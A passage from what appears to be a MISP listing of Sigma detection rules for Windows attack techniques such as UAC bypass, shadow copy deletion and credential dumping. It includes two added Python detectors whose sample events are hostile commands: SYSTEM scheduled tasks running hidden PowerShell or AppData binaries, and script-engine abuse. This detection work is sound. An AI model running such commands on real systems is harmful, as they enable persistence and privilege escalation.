creation_date 2018/11/22
falsepositive ['Unknown']
filename proc_creation_win_susp_file_characteristics.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.006']

Cscript/Wscript Uncommon Script Extension Execution

Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension

Internal MISP references

UUID 99b7460d-c9f1-40d7-a316-1f36f61d52ee which can be used as unique global reference for Cscript/Wscript Uncommon Script Extension Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Unknown']
filename proc_creation_win_wscript_cscript_uncommon_extension_exec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
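
As an added example (editor's code, not the rules' own logic and not from the MISP page), the Python below implements the two file-extension checks described on this page: the "Cscript/Wscript Uncommon Script Extension Execution" entry directly above, and the "Suspicious Parent Double Extension File Execution" entry earlier on the page. It goes a little beyond the descriptions by first extracting the script path from the wscript/cscript command line, skipping `//` host options such as `//E:vbscript`, which is the switch that lets a `.txt` or `.png` file run as VBScript in the first place. The extension lists, the field names and the sample events are assumptions for the demo.

```python
"""Added example (not the rules' logic, not code from the MISP page): extension
checks on process_creation events. Extension lists are assumptions chosen for
the demo; events are constructed samples.
"""
import re
import shlex
from pathlib import PureWindowsPath

# Assumption: the file types the Windows Script Host normally runs.
WSH_SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}

# Decoy "document" extension followed by an executable one, e.g. invoice.pdf.exe
DECOY_EXT = "doc|docx|pdf|xls|xlsx|ppt|pptx|jpg|jpeg|png|gif|txt|rtf|zip|rar|mp3|mp4"
EXEC_EXT = "exe|scr|com|pif|bat|cmd|ps1|vbs|vbe|js|jse|hta|lnk|msi"
DOUBLE_EXT = re.compile(r"\.(" + DECOY_EXT + r")\.(" + EXEC_EXT + r")(?=[\s\"']|$)",
                        re.IGNORECASE)


def _argv(cmdline):
    """Split a Windows command line; quotes are honoured around whole tokens only."""
    try:
        return [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:                    # unbalanced quote: fall back to a plain split
        return cmdline.split()


def wsh_target(cmdline):
    """For a wscript/cscript command line return the file it is told to run, else None.
    Host options start with '//' (//E:engine forces a script engine regardless of
    extension, //B suppresses prompts); the first other argument is the script."""
    argv = _argv(cmdline)
    if not argv:
        return None
    host = PureWindowsPath(argv[0]).name.lower()
    if host not in ("wscript.exe", "cscript.exe", "wscript", "cscript"):
        return None
    for arg in argv[1:]:
        if not arg.startswith("//"):
            return arg
    return None


def uncommon_script_extension(cmdline):
    """Return the target path when WSH runs a file whose extension is not a script one."""
    target = wsh_target(cmdline)
    if target is None:
        return None
    return None if PureWindowsPath(target).suffix.lower() in WSH_SCRIPT_EXT else target


def double_extension(text):
    """Return the decoy/executable extension pair found in a command line, else None."""
    m = DOUBLE_EXT.search(text)
    return m.group(0).lower() if m else None


def detect(event):
    """Apply both checks to one process_creation event and return its findings."""
    findings = []
    path = uncommon_script_extension(event.get("CommandLine", ""))
    if path:
        findings.append(f"wscript/cscript asked to run a non-script file: {path}")
    pair = double_extension(event.get("ParentCommandLine", ""))
    if pair:
        findings.append(f"parent process launched from a double-extension file ({pair})")
    return findings


SAMPLE_EVENTS = [  # constructed samples
    {"CommandLine": r"wscript.exe //E:vbscript //B C:\Users\Public\invoice.txt",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"CommandLine": r'"C:\Windows\System32\cmd.exe" /c start notepad.exe',
     "ParentCommandLine": r'"C:\Users\bob\Downloads\Invoice.pdf.exe"'},
    {"CommandLine": r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dlv",
     "ParentCommandLine": r"C:\Windows\System32\cmd.exe"},
]


def run(events=SAMPLE_EVENTS):
    """Return the findings list for each event, in order."""
    return [detect(e) for e in events]


if __name__ == "__main__":
    for e, f in zip(SAMPLE_EVENTS, run()):
        print(e["CommandLine"], "->", f or "clean")
```

The third sample is the legitimate `slmgr.vbs` invocation that the script-extension check must leave alone; the `/dlv` argument after the script path shows why only `//` options, not every slash-prefixed token, are skipped when locating the target.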

PUA - 3Proxy Execution

Detects the use of 3proxy, a tiny free proxy server

Internal MISP references

UUID f38a82d2-fba3-4781-b549-525efbec8506 which can be used as unique global reference for PUA - 3Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/13
falsepositive ['Administrative activity']
filename proc_creation_win_pua_3proxy_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572']

Bypass UAC via WSReset.exe

Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.

Internal MISP references

UUID d797268e-28a9-49a7-b9a8-2f5039011c5c which can be used as unique global reference for Bypass UAC via WSReset.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
creation_date 2019/10/24
falsepositive ['Unknown sub processes of Wsreset.exe']
filename proc_creation_win_uac_bypass_wsreset.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']

Remote Access Tool - UltraViewer Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 88656cec-6c3b-487c-82c0-f73ebb805503 which can be used as unique global reference for Remote Access Tool - UltraViewer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/25
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_ultraviewer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Python Inline Command Execution

Detects execution of Python with the "-c" flag, which can be used to launch a reverse shell or execute inline Python code.

Internal MISP references

UUID 899133d5-4d7c-4a7f-94ee-27355c879d90 which can be used as unique global reference for Python Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Python libraries that use a flag starting with "-c". Filter according to your environment']
filename proc_creation_win_python_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Schtasks Creation Or Modification With SYSTEM Privileges

Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges

Internal MISP references

UUID 89ca78fd-b37c-4310-b3d3-81a023f83936 which can be used as unique global reference for Schtasks Creation Or Modification With SYSTEM Privileges in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/28
falsepositive ['Unknown']
filename proc_creation_win_schtasks_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005']
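
As an added example (editor's code, not the rules' own logic and not from the MISP page), the Python below parses `schtasks.exe /create` and `/change` command lines into their options and applies the two checks described on this page: the "Schtasks Creation Or Modification With SYSTEM Privileges" entry directly above and the "Suspicious Schtasks Execution AppData Folder" entry earlier on the page. Option names follow the documented schtasks switches (`/tn`, `/tr`, `/ru`, `/sc` ...); the accepted spellings of the SYSTEM account, the field names and the sample events are assumptions for the demo.

```python
"""Added example (not the rules' logic, not code from the MISP page): a schtasks
command-line parser with the SYSTEM-principal and AppData\\Local checks.
Events are constructed samples.
"""
import shlex
from pathlib import PureWindowsPath

# Assumption: spellings of the LocalSystem account seen on command lines, plus
# its SID for completeness.
SYSTEM_ACCOUNTS = {"system", "nt authority\\system", "s-1-5-18"}


def _argv(cmdline):
    """Split a Windows command line; quotes are honoured around whole tokens only."""
    try:
        return [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:                    # unbalanced quote: fall back to a plain split
        return cmdline.split()


def parse_schtasks(cmdline):
    """Parse 'schtasks /create ...' or 'schtasks /change ...' into an option map
    (keys without the slash, lower-cased). Returns None for other verbs and for
    non-schtasks command lines."""
    argv = _argv(cmdline)
    if not argv or PureWindowsPath(argv[0]).name.lower() not in ("schtasks.exe", "schtasks"):
        return None
    verb, opts, i = None, {}, 1
    while i < len(argv):
        arg = argv[i]
        if not arg.startswith("/"):
            i += 1
            continue
        key = arg[1:].lower()
        if key in ("create", "change", "delete", "query", "run", "end", "showsid"):
            verb = key
            i += 1
        elif i + 1 < len(argv) and not argv[i + 1].startswith("/"):
            opts[key] = argv[i + 1]          # value-taking option: /tn, /tr, /ru, /sc ...
            i += 2
        else:
            opts[key] = True                 # bare flag: /f, /z, /it, /np ...
            i += 1
    if verb not in ("create", "change"):
        return None
    opts["verb"] = verb
    return opts


def detect_schtasks(event):
    """Return the findings for one process_creation event (empty list if none).
    Caveat: a task imported with /xml carries its principal and action inside the
    XML file, so neither check can see them on the command line."""
    opts = parse_schtasks(event.get("CommandLine", ""))
    if opts is None:
        return []
    findings = []
    name = opts.get("tn", "?")
    run_as = str(opts.get("ru", "")).lower()
    action = str(opts.get("tr", ""))
    if run_as in SYSTEM_ACCOUNTS:
        findings.append(f"task {name} {opts['verb']}d to run as SYSTEM")
    if "\\appdata\\local\\" in action.lower() or "%localappdata%" in action.lower():
        findings.append(f"task {name} runs a file from AppData\\Local: {action}")
    return findings


SAMPLE_EVENTS = [  # constructed samples
    {"CommandLine": r'schtasks /create /tn "Updater" /tr "C:\Users\bob\AppData\Local\Temp\upd.exe" '
                    r'/sc minute /mo 5 /ru SYSTEM /f'},
    {"CommandLine": r'schtasks /Change /TN "\Microsoft\Windows\Maint\Cleanup" /RU "NT AUTHORITY\SYSTEM" '
                    r'/TR "powershell -ep bypass -w hidden -f C:\ProgramData\m.ps1"'},
    {"CommandLine": r"schtasks /query /tn Updater /v"},
    {"CommandLine": r'schtasks /create /tn Backup /tr "C:\Program Files\Backup\run.exe" /sc daily /st 02:00'},
]


def run(events=SAMPLE_EVENTS):
    """Return the findings list for each event, in order."""
    return [detect_schtasks(e) for e in events]


if __name__ == "__main__":
    for e, f in zip(SAMPLE_EVENTS, run()):
        print(e["CommandLine"][:60], "->", f or "clean")
```

The second sample is the `/change` case the first entry's title calls out: an existing task under the Microsoft tree is re-pointed at a hidden PowerShell action and switched to the SYSTEM principal, which the AppData check alone would miss.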

Suspicious Greedy Compression Using Rar.EXE

Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes

Internal MISP references

UUID afe52666-401e-4a02-b4ff-5d128990b8cb which can be used as unique global reference for Suspicious Greedy Compression Using Rar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/12/15
falsepositive ['Unknown']
filename proc_creation_win_rar_susp_greedy_compression.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

HackTool - CrackMapExec Execution Patterns

Detects various execution patterns of the CrackMapExec pentesting framework

Internal MISP references

UUID 058f4380-962d-40a5-afce-50207d36d7e2 which can be used as unique global reference for HackTool - CrackMapExec Execution Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2020/05/22
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_execution_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.t1053', 'attack.t1059.003', 'attack.t1059.001', 'attack.s0106']
Related clusters

Whoami.EXE Execution From Privileged Process

Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors

Internal MISP references

UUID 79ce34ca-af29-4d0e-b832-fc1b377020db which can be used as unique global reference for Whoami.EXE Execution From Privileged Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Teymur Kheirkhabarov
creation_date 2022/01/28
falsepositive ['Unknown']
filename proc_creation_win_whoami_execution_from_high_priv_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.discovery', 'attack.t1033']
Related clusters

Nltest.EXE Execution

Detects nltest commands that can be used for information discovery

Internal MISP references

UUID 903076ff-f442-475a-b667-4f246bcc203b which can be used as unique global reference for Nltest.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Arun Chauhan
creation_date 2023/02/03
falsepositive ['Legitimate administration activity']
filename proc_creation_win_nltest_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016', 'attack.t1018', 'attack.t1482']
Related clusters

Remote Access Tool - Simple Help Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 95e60a2b-4705-444b-b7da-ba0ea81a3ee2 which can be used as unique global reference for Remote Access Tool - Simple Help Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/23
falsepositive ['Legitimate usage of the tool']
filename proc_creation_win_remote_access_tools_simple_help.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

Shadow Copies Deletion Using Operating Systems Utilities

Detects deletion of Shadow Copies using operating system utilities

Internal MISP references

UUID c947b146-0abc-4c87-9c64-b17e9d7274a2 which can be used as unique global reference for Shadow Copies Deletion Using Operating Systems Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
creation_date 2019/10/22
falsepositive ['Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason', 'LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)']
filename proc_creation_win_susp_shadow_copies_deletion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1070', 'attack.t1490']
Related clusters

Fsutil Drive Enumeration

Attackers may leverage fsutil to enumerate connected drives.

Internal MISP references

UUID 63de06b9-a385-40b5-8b32-73f2b9ef84b6 which can be used as unique global reference for Fsutil Drive Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2022/03/29
falsepositive ['Certain software or administrative tasks may trigger false positives.']
filename proc_creation_win_fsutil_drive_enumeration.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1120']
Related clusters

Lolbin Ssh.exe Use As Proxy

Detects usage of the "ssh.exe" binary as a proxy to launch other programs

Internal MISP references

UUID 7d6d30b8-5b91-4b90-a891-46cccaf29598 which can be used as unique global reference for Lolbin Ssh.exe Use As Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/12/29
falsepositive ['Legitimate usage for administration purposes']
filename proc_creation_win_lolbin_ssh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

Potential Suspicious Activity Using SeCEdit

Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy

Internal MISP references

UUID c2c76b77-32be-4d1f-82c9-7e544bdfe0eb which can be used as unique global reference for Potential Suspicious Activity Using SeCEdit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022/11/18
falsepositive ['Legitimate administrative use']
filename proc_creation_win_secedit_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.persistence', 'attack.defense_evasion', 'attack.credential_access', 'attack.privilege_escalation', 'attack.t1562.002', 'attack.t1547.001', 'attack.t1505.005', 'attack.t1556.002', 'attack.t1562', 'attack.t1574.007', 'attack.t1564.002', 'attack.t1546.008', 'attack.t1546.007', 'attack.t1547.014', 'attack.t1547.010', 'attack.t1547.002', 'attack.t1557', 'attack.t1082']
Related clusters

Wab Execution From Non Default Location

Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non-default locations, as seen with Bumblebee activity

Internal MISP references

UUID 395907ee-96e5-4666-af2e-2ca91688e151 which can be used as unique global reference for Wab Execution From Non Default Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename proc_creation_win_wab_execution_from_non_default_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

File Download Via Bitsadmin

Detects usage of bitsadmin downloading a file

Internal MISP references

UUID d059842b-6b9d-4ed1-b5c3-5b89143c6ede which can be used as unique global reference for File Download Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, FPT.EagleEye
creation_date 2017/03/09
falsepositive ['Some legitimate apps use this, but limited.']
filename proc_creation_win_bitsadmin_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

Potentially Suspicious Office Document Executed From Trusted Location

Detects the execution of an Office application that points to a document located in a trusted location. Attackers often use this to avoid macro security and execute their malicious code.

Internal MISP references

UUID f99abdf0-6283-4e71-bd2b-b5c048a94743 which can be used as unique global reference for Potentially Suspicious Office Document Executed From Trusted Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/21
falsepositive ['Unknown']
filename proc_creation_win_office_exec_from_trusted_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

Potential Suspicious Registry File Imported Via Reg.EXE

Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility

Internal MISP references

UUID 62e0298b-e994-4189-bc87-bc699aa62d97 which can be used as unique global reference for Potential Suspicious Registry File Imported Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/08/01
falsepositive ['Legitimate import of keys']
filename proc_creation_win_reg_import_from_suspicious_paths.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']
Related clusters

Use of VSIISExeLauncher.exe

The "VSIISExeLauncher.exe" binary, part of Visual Studio/VS Code, can be used to execute arbitrary binaries

Internal MISP references

UUID 18749301-f1c5-4efc-a4c3-276ff1f5b6f8 which can be used as unique global reference for Use of VSIISExeLauncher.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/09
falsepositive ['Unknown']
filename proc_creation_win_lolbin_vsiisexelauncher.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

Regedit as Trusted Installer

Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe

Internal MISP references

UUID 883835a7-df45-43e4-bf1d-4268768afda4 which can be used as unique global reference for Regedit as Trusted Installer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/27
falsepositive ['Unlikely']
filename proc_creation_win_regedit_trustedinstaller.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.

Internal MISP references

UUID a7c3d773-caef-227e-a7e7-c2f13c622329 which can be used as unique global reference for Bad Opsec Defaults Sacrificial Processes With Improper Arguments in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
creation_date 2020/10/23
falsepositive ['Unlikely']
filename proc_creation_win_susp_bad_opsec_sacrificial_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

Suspicious File Downloaded From Direct IP Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.

Internal MISP references

UUID 13e6fe51-d478-4c7e-b0f2-6da9b400a829 which can be used as unique global reference for Suspicious File Downloaded From Direct IP Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

Potential RDP Tunneling Via SSH

Detects execution of ssh.exe to perform data exfiltration and tunneling through RDP

Internal MISP references

UUID f7d7ebd5-a016-46e2-9c54-f9932f2d386d which can be used as unique global reference for Potential RDP Tunneling Via SSH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/12
falsepositive ['Unknown']
filename proc_creation_win_ssh_rdp_tunneling.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572']
Related clusters

Arbitrary File Download Via IMEWDBLD.EXE

Detects usage of "IMEWDBLD.exe" to download arbitrary files

Internal MISP references

UUID 863218bd-c7d0-4c52-80cd-0a96c09f54af which can be used as unique global reference for Arbitrary File Download Via IMEWDBLD.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/11/09
falsepositive ['Unknown']
filename proc_creation_win_imewbdld_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

REGISTER_APP.VBS Proxy Execution

Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.

Internal MISP references

UUID 1c8774a0-44d4-4db0-91f8-e792359c70bd which can be used as unique global reference for REGISTER_APP.VBS Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ["Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign"]
filename proc_creation_win_lolbin_register_app.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

Suspicious Service Binary Directory

Detects a service binary running in a suspicious directory

Internal MISP references

UUID 883faa95-175a-4e22-8181-e5761aeb373c which can be used as unique global reference for Suspicious Service Binary Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/09
falsepositive ['Unknown']
filename proc_creation_win_susp_service_dir.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

Modify Group Policy Settings

Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.

Internal MISP references

UUID ada4b0c4-758b-46ac-9033-9004613a150d which can be used as unique global reference for Modify Group Policy Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Legitimate use']
filename proc_creation_win_reg_modify_group_policy_settings.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1484.001']
Related clusters

Renamed Vmnat.exe Execution

Detects renamed vmnat.exe or portable version that can be used for DLL side-loading

Internal MISP references

UUID 7b4f794b-590a-4ad4-ba18-7964a2832205 which can be used as unique global reference for Renamed Vmnat.exe Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/09/09
falsepositive ['Unknown']
filename proc_creation_win_renamed_vmnat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

HackTool - LocalPotato Execution

Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples

Internal MISP references

UUID 6bd75993-9888-4f91-9404-e1e4e4e34b77 which can be used as unique global reference for HackTool - LocalPotato Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unlikely']
filename proc_creation_win_hktl_localpotato.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'cve.2023.21746']

HackTool - Impersonate Execution

Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively

Internal MISP references

UUID cf0c254b-22f1-4b2b-8221-e137b3c0af94 which can be used as unique global reference for HackTool - Impersonate Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti @pulisettis
creation_date 2022/12/21
falsepositive ['Unknown']
filename proc_creation_win_hktl_impersonate.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1134.001', 'attack.t1134.003']
Related clusters

Arbitrary File Download Via PresentationHost.EXE

Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files

Internal MISP references

UUID b124ddf4-778d-418e-907f-6dd3fc0d31cd which can be used as unique global reference for Arbitrary File Download Via PresentationHost.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_presentationhost_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

Suspicious Processes Spawned by Java.EXE

Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)

Internal MISP references

UUID 0d34ed8b-1c12-4ff2-828c-16fc860b766d which can be used as unique global reference for Suspicious Processes Spawned by Java.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), Florian Roth
creation_date 2021/12/17
falsepositive ['Legitimate calls to system binaries', 'Company specific internal usage']
filename proc_creation_win_java_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Potential Credential Dumping Attempt Using New NetworkProvider - CLI

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

Internal MISP references

UUID baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 which can be used as unique global reference for Potential Credential Dumping Attempt Using New NetworkProvider - CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/23
falsepositive ['Other legitimate network providers used and not filtered in this rule']
filename proc_creation_win_registry_new_network_provider.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

Use of Pcalua For Execution

Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.

Internal MISP references

UUID 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2 which can be used as unique global reference for Use of Pcalua For Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2022/06/14
falsepositive ['Legitimate use via a batch script or by an administrator.']
filename proc_creation_win_lolbin_pcalua.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

Install New Package Via Winget Local Manifest

Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.

Internal MISP references

UUID 313d6012-51a0-4d93-8dfc-de8553239e25 which can be used as unique global reference for Install New Package Via Winget Local Manifest in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman, Florian Roth (Nextron Systems), frack113
creation_date 2020/04/21
falsepositive ['Some false positives are expected in environments that use this functionality to install and test custom applications']
filename proc_creation_win_winget_local_install_via_manifest.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

Non-privileged Usage of Reg or Powershell

Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry

Internal MISP references

UUID 8f02c935-effe-45b3-8fc9-ef8696a9e41d which can be used as unique global reference for Non-privileged Usage of Reg or Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
creation_date 2020/10/05
falsepositive ['Unknown']
